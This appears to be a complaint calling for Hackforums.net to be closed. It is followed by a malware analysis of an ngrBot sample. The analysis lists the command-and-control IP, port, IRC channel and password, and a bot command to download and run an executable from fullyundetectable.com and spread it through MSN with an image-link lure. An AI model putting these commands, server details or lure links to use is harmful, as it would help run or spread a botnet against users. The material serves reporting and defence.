Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.

I'm not certain of what your criteria if for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activitie and it should be closed as soon as posible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

77.79.7.246(ngrBot hosted in Lithuania Splius Uab)

DNS Lookup
Host Name IP Address
api.wipmania.com
api.wipmania.com 213.251.170.52
fullyundetectable.com
UDP Connections
Download URLs
http://213.251.170.52/ (api.wipmania.com)

Outgoing connection to remote server: api.wipmania.com TCP port 80
C&C Server: 77.79.7.246:1863
Server Password:
Username: iogjzhd
Nickname: n{DE|XPa}iogjzhd
Channel: #ngr (Password: ngrbot)
Channeltopic: :.s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg


Now talking in #ngr
Topic On: [ #ngr ] [ .s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg ]
Topic By: [ DCO ]
Joins: {USA|W7u}gpqhwpn [gpqhwpn@5BD873C8.B62ADEB3.A9D605B8.IP](13{USA|W7u}gpqhwpn) [MSN]: Updated MSN spread interval to "5"
{USA|W7u}gpqhwpn) [MSN]: Updated MSN spread message to "http://img33.lmageshack.org/images/?id=image11.jpg"

hosting infos:
http://whois.domaintools.com/77.79.7.246